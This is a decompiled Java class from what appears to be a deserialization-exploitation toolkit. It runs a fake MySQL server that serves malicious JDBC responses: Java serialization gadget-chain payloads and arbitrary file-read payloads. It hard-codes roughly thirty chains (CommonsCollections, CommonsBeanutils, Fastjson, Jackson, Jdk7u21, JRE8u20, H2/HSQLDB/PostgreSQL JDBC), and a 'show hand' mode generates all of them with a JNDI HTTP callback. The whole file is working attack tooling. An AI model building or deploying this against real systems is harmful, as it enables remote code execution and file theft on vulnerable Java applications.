package com.ar3h.chains.web.service.impl;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Payload;
import com.ar3h.chains.common.Result;
import com.ar3h.chains.common.exception.ThrowsUtil;
import com.ar3h.chains.common.util.PortUtil;
import com.ar3h.chains.core.ExecutionEngine;
import com.ar3h.chains.core.PayloadFactory;
import com.ar3h.chains.core.payload.PayloadType;
import com.ar3h.chains.core.payload.impl.JavaNativePayload;
import com.ar3h.chains.gadget.impl.common.expression.BcelConvert;
import com.ar3h.chains.gadget.impl.common.expression.JsConvert;
import com.ar3h.chains.gadget.impl.common.jdbc.PostgreSqlJdbc4Jndi;
import com.ar3h.chains.gadget.impl.common.jdbc.h2.H2JavaJdbc1;
import com.ar3h.chains.gadget.impl.common.jdbc.hsqldb.HsqldbDefineClassJdbc;
import com.ar3h.chains.gadget.impl.common.other.SpringBeanXmlClassLoader;
import com.ar3h.chains.gadget.impl.javanative.commons.beanutils.CommonsBeanutils1;
import com.ar3h.chains.gadget.impl.javanative.commons.beanutils.CommonsBeanutils2;
import com.ar3h.chains.gadget.impl.javanative.commons.beanutils.CommonsBeanutils3;
import com.ar3h.chains.gadget.impl.javanative.commons.beanutils.CommonsBeanutils4;
import com.ar3h.chains.gadget.impl.javanative.commons.collection_v3.CommonsCollectionsK1;
import com.ar3h.chains.gadget.impl.javanative.commons.collection_v3.CommonsCollectionsK3;
import com.ar3h.chains.gadget.impl.javanative.commons.collection_v4.CommonsCollectionsK2;
import com.ar3h.chains.gadget.impl.javanative.commons.collection_v4.CommonsCollectionsK4;
import com.ar3h.chains.gadget.impl.javanative.commons.collections.TransformerWithBcel;
import com.ar3h.chains.gadget.impl.javanative.commons.collections.TransformerWithJs;
import com.ar3h.chains.gadget.impl.javanative.commons.collections.TransformerWithMethodHandles;
import com.ar3h.chains.gadget.impl.javanative.commons.collections.TransformerWithTemplatesImpl;
import com.ar3h.chains.gadget.impl.javanative.commons.jdk.TWrap;
import com.ar3h.chains.gadget.impl.javanative.commons.jdk.TemplatesImpl;
import com.ar3h.chains.gadget.impl.javanative.datasource.druid.DruidDataSource;
import com.ar3h.chains.gadget.impl.javanative.datasource.postgresql.PostgreSqlDataSource;
import com.ar3h.chains.gadget.impl.javanative.fastjson.Fastjson;
import com.ar3h.chains.gadget.impl.javanative.jackson.Jackson;
import com.ar3h.chains.gadget.impl.javanative.jdk.JRE8u20;
import com.ar3h.chains.gadget.impl.javanative.jdk.Jdk7u21;
import com.ar3h.chains.web.controller.ChainsController;
import com.ar3h.chains.web.dto.ParseReq;
import com.ar3h.chains.web.jndi.utils.Config;
import com.ar3h.chains.web.mysql.MysqlChainsStarter;
import com.ar3h.chains.web.mysql.core.Cache;
import com.ar3h.chains.web.mysql.core.MysqlData;
import com.ar3h.chains.web.mysql.core.MysqlType;
import com.ar3h.chains.web.service.CommonParse;
import com.ar3h.chains.web.service.GadgetService;
import com.ar3h.chains.web.service.ParseHandler;
import com.ar3h.chains.web.util.SpringContext;
import com.vaadin.shared.JsonConstants;
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.stream.Collectors;
import org.apache.commons.codec.digest.DigestUtils;
import org.hibernate.validator.internal.metadata.core.ConstraintHelper;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;

@Component
/* loaded from: input_file:BOOT-INF/classes/com/ar3h/chains/web/service/impl/FakeMySQLParse.class */
public class FakeMySQLParse implements ParseHandler {

    @Autowired
    public GadgetService gadgetService;
    private static FakeMySQLParse INSTANCE;
    private static final Logger log = LoggerFactory.getLogger((Class<?>) FakeMySQLParse.class);
    public static Class<?>[][] classesCombination = {new Class[]{JavaNativePayload.class, Fastjson.class, TemplatesImpl.class}, new Class[]{JavaNativePayload.class, Jackson.class, TWrap.class, TemplatesImpl.class}, new Class[]{JavaNativePayload.class, Jackson.class, TemplatesImpl.class}, new Class[]{JavaNativePayload.class, CommonsCollectionsK1.class, TemplatesImpl.class}, new Class[]{JavaNativePayload.class, CommonsCollectionsK3.class, TransformerWithTemplatesImpl.class, TemplatesImpl.class}, new Class[]{JavaNativePayload.class, CommonsCollectionsK3.class, TransformerWithJs.class, JsConvert.class}, new Class[]{JavaNativePayload.class, CommonsCollectionsK3.class, TransformerWithBcel.class, BcelConvert.class}, new Class[]{JavaNativePayload.class, CommonsCollectionsK3.class, TransformerWithMethodHandles.class}, new Class[]{JavaNativePayload.class, CommonsCollectionsK4.class, TransformerWithTemplatesImpl.class, TemplatesImpl.class}, new Class[]{JavaNativePayload.class, CommonsCollectionsK4.class, TransformerWithJs.class, JsConvert.class}, new Class[]{JavaNativePayload.class, CommonsCollectionsK4.class, TransformerWithBcel.class, BcelConvert.class}, new Class[]{JavaNativePayload.class, CommonsCollectionsK4.class, TransformerWithMethodHandles.class}, new Class[]{JavaNativePayload.class, CommonsCollectionsK2.class, TemplatesImpl.class}, new Class[]{JavaNativePayload.class, CommonsBeanutils1.class, TemplatesImpl.class}, new Class[]{JavaNativePayload.class, CommonsBeanutils1.class, DruidDataSource.class, H2JavaJdbc1.class}, new Class[]{JavaNativePayload.class, CommonsBeanutils1.class, DruidDataSource.class, HsqldbDefineClassJdbc.class}, new Class[]{JavaNativePayload.class, CommonsBeanutils1.class, PostgreSqlDataSource.class, PostgreSqlJdbc4Jndi.class, SpringBeanXmlClassLoader.class}, new Class[]{JavaNativePayload.class, CommonsBeanutils2.class, TemplatesImpl.class}, new Class[]{JavaNativePayload.class, CommonsBeanutils2.class, DruidDataSource.class, H2JavaJdbc1.class}, new Class[]{JavaNativePayload.class, CommonsBeanutils2.class, DruidDataSource.class, HsqldbDefineClassJdbc.class}, new Class[]{JavaNativePayload.class, CommonsBeanutils2.class, PostgreSqlDataSource.class, PostgreSqlJdbc4Jndi.class, SpringBeanXmlClassLoader.class}, new Class[]{JavaNativePayload.class, CommonsBeanutils3.class, TemplatesImpl.class}, new Class[]{JavaNativePayload.class, CommonsBeanutils3.class, DruidDataSource.class, H2JavaJdbc1.class}, new Class[]{JavaNativePayload.class, CommonsBeanutils3.class, DruidDataSource.class, HsqldbDefineClassJdbc.class}, new Class[]{JavaNativePayload.class, CommonsBeanutils3.class, PostgreSqlDataSource.class, PostgreSqlJdbc4Jndi.class, SpringBeanXmlClassLoader.class}, new Class[]{JavaNativePayload.class, CommonsBeanutils4.class, TemplatesImpl.class}, new Class[]{JavaNativePayload.class, CommonsBeanutils4.class, DruidDataSource.class, H2JavaJdbc1.class}, new Class[]{JavaNativePayload.class, CommonsBeanutils4.class, DruidDataSource.class, HsqldbDefineClassJdbc.class}, new Class[]{JavaNativePayload.class, CommonsBeanutils4.class, PostgreSqlDataSource.class, PostgreSqlJdbc4Jndi.class, SpringBeanXmlClassLoader.class}, new Class[]{JavaNativePayload.class, Jdk7u21.class, TemplatesImpl.class}, new Class[]{JavaNativePayload.class, JRE8u20.class, TemplatesImpl.class}};

    public static FakeMySQLParse getInstance() {
        if (INSTANCE == null) {
            INSTANCE = (FakeMySQLParse) SpringContext.getApplicationContext().getBean(FakeMySQLParse.class);
        }
        return INSTANCE;
    }

    @Override // com.ar3h.chains.web.service.ParseHandler
    public Result handle(ParseReq parseReq) throws Exception {
        if (!PortUtil.isLocalPortOpen(MysqlChainsStarter.mysqlPort)) {
            log.info("Auto Enable FakeMySQL Server");
            MysqlChainsStarter.main(new String[0]);
            int i = 50;
            while (true) {
                if (PortUtil.isLocalPortOpen(MysqlChainsStarter.mysqlPort)) {
                    break;
                }
                Thread.sleep(100L);
                int i2 = i;
                i--;
                if (i2 <= 0) {
                    log.warn("FakeMySQL Server start timeout");
                    break;
                }
            }
        }
        String payloadName = parseReq.getPayloadName();
        MysqlData mysqlData = new MysqlData();
        if (PayloadType.FAKE_MYSQL_SHOW_HAND_PAYLOAD.equalsIgnoreCase(payloadName)) {
            try {
                return handleShowHand(parseReq);
            } catch (Exception e) {
                e.printStackTrace();
                return Result.error(e.getMessage());
            }
        }
        if (PayloadType.FAKE_MYSQL_PAYLOAD.equalsIgnoreCase(payloadName)) {
            mysqlData.setType(MysqlType.JavaSerialization);
        } else {
            if (!PayloadType.FAKE_MYSQL_READ_PAYLOAD.equalsIgnoreCase(payloadName)) {
                return Result.error("payload type: " + payloadName + " is not supported, plz using " + PayloadType.FAKE_MYSQL_PAYLOAD + " or " + PayloadType.FAKE_MYSQL_READ_PAYLOAD);
            }
            mysqlData.setType(MysqlType.ReadFile);
        }
        Result<HashMap<Object, Object>> parseRawPayload = CommonParse.parseRawPayload(parseReq);
        if (!parseRawPayload.isSuccess()) {
            return parseRawPayload;
        }
        HashMap<Object, Object> data = parseRawPayload.getData();
        mysqlData.setData(data.get("object"));
        GadgetContext gadgetContext = (GadgetContext) data.get("gadgetContext");
        mysqlData.setContext(gadgetContext);
        String str = "";
        if (PayloadType.FAKE_MYSQL_PAYLOAD.equalsIgnoreCase(payloadName)) {
            str = "d" + DigestUtils.md5Hex(String.valueOf(System.currentTimeMillis()).getBytes()).toLowerCase().substring(0, 6);
        } else if (PayloadType.FAKE_MYSQL_READ_PAYLOAD.equalsIgnoreCase(payloadName)) {
            str = JsonConstants.VTYPE_FLOAT + DigestUtils.md5Hex(String.valueOf(System.currentTimeMillis()).getBytes()).toLowerCase().substring(0, 6);
        }
        mysqlData.setKey(str);
        Cache.mysqlDataMap.put("DEFAULT", mysqlData);
        Cache.mysqlDataMap.put(str, mysqlData);
        HashMap hashMap = new HashMap();
        hashMap.put("context", ChainsController.convertContextData(gadgetContext.getContextData()));
        StringBuilder sb = new StringBuilder();
        if (!PortUtil.isLocalPortOpen(MysqlChainsStarter.mysqlPort)) {
            sb.append("WARN: mysqlPort is close\n");
        }
        sb.append("mysql jdbc username: " + str);
        sb.append("\n");
        sb.append("Construct a JDBC Attack Payload based on the actual environment and initiate a request to port " + MysqlChainsStarter.mysqlPort + " of the current server.");
        hashMap.put(ConstraintHelper.PAYLOAD, sb.toString().getBytes());
        log.info("mysql jdbc username:  {}", str);
        return Result.success(hashMap);
    }

    public static MysqlData createMysqlData(Payload payload) {
        MysqlData mysqlData = new MysqlData();
        String simpleName = payload.getClass().getSimpleName();
        if (PayloadType.FAKE_MYSQL_PAYLOAD.equalsIgnoreCase(simpleName)) {
            mysqlData.setType(MysqlType.JavaSerialization);
        } else if (PayloadType.FAKE_MYSQL_READ_PAYLOAD.equalsIgnoreCase(simpleName)) {
            mysqlData.setType(MysqlType.ReadFile);
        } else {
            ThrowsUtil.throwGadgetException("payload type: " + simpleName + " is not supported, plz using " + PayloadType.FAKE_MYSQL_PAYLOAD + " or " + PayloadType.FAKE_MYSQL_READ_PAYLOAD);
        }
        Result<HashMap<Object, Object>> build = CommonParse.build(ExecutionEngine.create(payload), new GadgetContext());
        if (!build.isSuccess()) {
            ThrowsUtil.throwGadgetException(build.getMessage());
        }
        HashMap<Object, Object> data = build.getData();
        mysqlData.setData(data.get("object"));
        mysqlData.setContext((GadgetContext) data.get("gadgetContext"));
        String str = "";
        if (PayloadType.FAKE_MYSQL_PAYLOAD.equalsIgnoreCase(simpleName)) {
            str = "d" + DigestUtils.md5Hex(String.valueOf(System.currentTimeMillis()).getBytes()).toLowerCase().substring(0, 6);
        } else if (PayloadType.FAKE_MYSQL_READ_PAYLOAD.equalsIgnoreCase(simpleName)) {
            str = JsonConstants.VTYPE_FLOAT + DigestUtils.md5Hex(String.valueOf(System.currentTimeMillis()).getBytes()).toLowerCase().substring(0, 6);
        }
        mysqlData.setKey(str);
        return mysqlData;
    }

    public Result handleShowHand(ParseReq parseReq) throws InstantiationException, IllegalAccessException {
        String payloadName = parseReq.getPayloadName();
        List<String> gadgetList = parseReq.getGadgetList();
        Map<String, String> params = parseReq.getParams();
        if (payloadName == null || gadgetList == null || gadgetList.isEmpty()) {
            return Result.error("payloadName or gadgetList not found");
        }
        if (PayloadFactory.getPayloadClass(payloadName) == null) {
            return Result.error("payloadName not found");
        }
        StringBuffer stringBuffer = new StringBuffer();
        if (!PortUtil.isLocalPortOpen(MysqlChainsStarter.mysqlPort)) {
            stringBuffer.append("WARN: mysqlPort is close\n");
        }
        HashMap hashMap = new HashMap();
        HashMap hashMap2 = new HashMap();
        String format = String.format("http://%s:%s/", Config.ip, Integer.valueOf(Config.httpPort));
        StringBuilder sb = new StringBuilder();
        for (Class<?>[] clsArr : classesCombination) {
            GadgetContext gadgetContext = new GadgetContext();
            gadgetContext.put(ContextTag.JNDI_HTTP_URL, format);
            ExecutionEngine executionEngine = new ExecutionEngine((Payload) clsArr[0].newInstance());
            for (Class cls : (Class[]) Arrays.copyOfRange(clsArr, 1, clsArr.length)) {
                executionEngine.add((Gadget) cls.newInstance());
            }
            executionEngine.addAll(gadgetList);
            if (params != null) {
                executionEngine.setAll(params);
            }
            Object data = executionEngine.build(gadgetContext).getData();
            MysqlData mysqlData = new MysqlData();
            mysqlData.setType(MysqlType.JavaSerialization);
            mysqlData.setData(data);
            mysqlData.setContext(gadgetContext);
            Object obj = gadgetContext.get(ContextTag.CACHE_FILES_MAP);
            if (obj != null) {
                for (Map.Entry entry : ((Map) obj).entrySet()) {
                    com.ar3h.chains.web.jndi.core.Cache.set((String) entry.getKey(), (byte[]) entry.getValue());
                }
            }
            String randomKey = JndiParse.getRandomKey();
            mysqlData.setKey(randomKey);
            Cache.mysqlDataMap.put(randomKey, mysqlData);
            stringBuffer.append(randomKey).append("\n");
            hashMap2.putAll(ChainsController.convertContextData(gadgetContext.getContextData()));
            sb.append(randomKey + " ==> " + ((String) Arrays.stream(clsArr).map(cls2 -> {
                return cls2.getSimpleName();
            }).collect(Collectors.joining(", "))) + "\n");
        }
        log.info("FakeMysql payloadName: {}", payloadName);
        hashMap2.clear();
        hashMap2.put("Token ==> Payload Map", sb.toString());
        hashMap.put(ConstraintHelper.PAYLOAD, stringBuffer.toString().getBytes());
        hashMap.put("context", hashMap2);
        return Result.success(hashMap);
    }
}
